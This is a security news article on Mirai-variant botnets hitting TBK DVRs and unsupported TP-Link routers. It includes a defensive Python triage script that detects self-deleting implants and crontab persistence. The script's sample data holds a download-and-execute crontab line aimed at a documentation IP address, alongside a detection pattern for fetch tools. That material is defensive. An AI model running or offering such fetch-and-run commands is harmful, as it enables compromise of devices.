In recent months malicious actors have been repurposing home and small-business devices to build botnets capable of launching large-scale attacks. According to security firms such as Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, TBK digital video recorders (DVRs) and TP-Link Wi-Fi routers that have already reached end of support are being exploited to deploy Mirai variants and related tooling.
In the case of the TBK DVR devices, analysts identified exploitation of the vulnerability tracked as CVE-2024-3721. The attackers use this flaw to run a small downloader script that, depending on the Linux architecture of the compromised device, installs a Mirai variant the researchers named "Nexcorium." The process is simple but effective: the infection chain detects the architecture, downloads the matching binary and launches it; shortly afterwards the infected device displays a control message, "nexuscorp has taken control", confirming the actor's foothold on the device.

Nexcorium is not a toy: it shares the components typical of modern IoT botnet families, the researchers explain. Its features include initialization of an XOR-encoded configuration table, a watchdog module that keeps the malware running, and several DDoS modules. It also bundles known exploits, for example it attempts to abuse CVE-2017-17215 to compromise Huawei HG532 routers that may sit on the same network, and it carries a built-in credential list used for brute-force attacks against exposed Telnet services.
If a Telnet attempt succeeds, Nexcorium tries to obtain a shell, establish persistence through a crontab entry or a system service, and connect to a command-and-control server to receive attack instructions (UDP, TCP or even SMTP). To hinder forensic analysis, once a persistence mechanism is in place it deletes its original binary from the device.
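A triage check for the two behaviours just described (persistence via crontab and deletion of the running binary), as an added example that is not part of the original article or of the Fortinet/Unit 42 analyses. It assumes a Linux host on which `/proc/<pid>/exe` can be read; the process table, crontab contents, scratch-directory list and the 198.51.100.7 address are constructed for illustration.

```python
"""Post-compromise triage for Mirai-style IoT implants (added example).

Two checks drawn from the behaviour described in the article:
  1. a running process whose on-disk binary has been unlinked, which the
     kernel reports as "/path/to/bin (deleted)" in /proc/<pid>/exe;
  2. crontab entries that re-fetch or re-launch a payload from a writable
     scratch directory.
The sample process table and crontab below are constructed, not real data.
"""
import os
import re
from typing import Dict, List, Tuple

# Writable directories where downloader scripts typically drop binaries
# (assumed list, chosen for the example; extend for your platform).
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/run/", "/var/tmp/", "/data/local/tmp/")
# Fetch tools commonly invoked by IoT downloader one-liners.
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")


def deleted_exe_processes(proc_table: Dict[int, str]) -> List[Tuple[int, str]]:
    """Return (pid, exe_target) for processes whose executable was unlinked.

    `proc_table` maps pid -> readlink("/proc/<pid>/exe"). The kernel appends
    " (deleted)" when the inode is no longer linked from any directory, which
    is exactly the trace a self-deleting bot leaves behind.
    """
    return [(pid, path) for pid, path in sorted(proc_table.items())
            if path.endswith(" (deleted)")]


def suspicious_cron_lines(crontab: str) -> List[str]:
    """Return crontab lines that fetch or execute from scratch directories."""
    hits = []
    for line in crontab.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        # Either "@reboot <cmd>" or five schedule fields followed by <cmd>.
        if stripped.startswith("@"):
            fields = stripped.split(None, 1)
            command = fields[1] if len(fields) == 2 else ""
        else:
            fields = stripped.split(None, 5)
            command = fields[5] if len(fields) == 6 else ""
        if DOWNLOADERS.search(command) or any(d in command for d in SCRATCH_DIRS):
            hits.append(stripped)
    return hits


def live_proc_table() -> Dict[int, str]:
    """Read the real process table from /proc (Linux; root sees every pid)."""
    table: Dict[int, str] = {}
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                table[int(entry)] = os.readlink(f"/proc/{entry}/exe")
            except OSError:
                continue  # kernel threads, or pids we may not inspect
    return table


# Constructed sample data: one bot that unlinked itself after starting, and
# a crontab that re-downloads the payload from a TEST-NET-2 address.
SAMPLE_PROC = {
    1: "/sbin/init",
    734: "/usr/sbin/telnetd",
    2157: "/tmp/.x86 (deleted)",
    2160: "/usr/bin/busybox",
}
SAMPLE_CRONTAB = """\
# constructed crontab for the example
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * cd /tmp && wget http://198.51.100.7/bins/mips -O .m && chmod +x .m && ./.m
@reboot /dev/shm/.w
"""

if __name__ == "__main__":
    for pid, path in deleted_exe_processes(SAMPLE_PROC):
        print(f"[!] pid {pid} runs from an unlinked binary: {path}")
    for entry in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(f"[!] suspicious cron entry: {entry}")
```

Swap `SAMPLE_PROC` for `live_proc_table()` to run the first check on a real host, and feed it the output of `crontab -l` or the contents of `/etc/crontabs/*` for the second. A `(deleted)` executable is not proof on its own: a package upgrade that replaces a binary while the old one is still running produces the same trace, so treat a hit as a lead to pivot from (network connections of that pid, its memory map) rather than a verdict.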
The technical description and indicators of compromise for this campaign can be found in the researchers' analyses; Fortinet documents these behaviours in its research publications and Palo Alto Networks offers additional context on the automated activity it observes on the network. For those who want to dig deeper, the vendors' and incident response teams' portals publish reports that help track how these threats evolve: Fortinet publishes technical threat research on its FortiGuard Labs blog, and Palo Alto Networks Unit 42 maintains malware analysis and IoT campaign write-ups on its own blog.
In parallel, Unit 42 detected active scanning for a TP-Link router vulnerability tracked as CVE-2023-33538. These devices are already out of support, and although the attempts the researchers observed were poorly constructed and did not execute code, the underlying flaw is real; CISA has therefore added the entry to its catalog of vulnerabilities exploited in the wild. The list of affected models includes specific firmware versions of the TL-WR940N, TL-WR740N and TL-WR841N, which remain common in home networks and small offices and are therefore an easy target for automated campaigns.
The problem is not just the existence of flaws but their combination with default credentials and devices that no longer receive patches. When a router stops receiving updates and still uses factory passwords, a vulnerability that would otherwise require authentication becomes a critical entry point for a determined attacker. Unit 42 further warns that the samples it has tracked can update themselves and pose as web servers that spread the infection to devices that connect to them.

For those who manage home networks or small infrastructure, the practical recommendations are not new but they are crucial: replace unsupported equipment with current models, change default credentials, disable unnecessary services such as Telnet, and segment the network so that cameras, recorders and other IoT devices are isolated from everything else. CISA maintains a public catalog of vulnerabilities exploited in the wild, with remediation guidance, that is worth reviewing on its site. It is also worth consulting the vulnerability descriptions in the national repository to understand the technical impact, for example the NVD entries for CVE-2017-17215 and CVE-2023-33538.
The reappearance of Mirai and its derivatives is no surprise: these families remain the preferred choice of botnet operators for their simplicity, low cost and the large number of exposed devices still running default settings. Recent third-party research, including reports on "loader-as-a-service" offerings that distribute payloads such as Mirai, also shows a mature criminal ecosystem that makes these infections accessible to groups of varying skill. To understand these abuse models, reports from companies such as CloudSEK offer context on how these tools are monetized and distributed; the CloudSEK Research blog is a good introduction.
The lesson is clear: network security starts at the weakest perimeter, often an unpatched router or camera, and rests on basic but effective measures. Keeping firmware up to date where possible, replacing EoL equipment, removing default accounts and passwords, and monitoring for unusual connections are steps that dramatically reduce the risk of ending up as part of a botnet that, in the end, can affect both privacy and the availability of Internet services.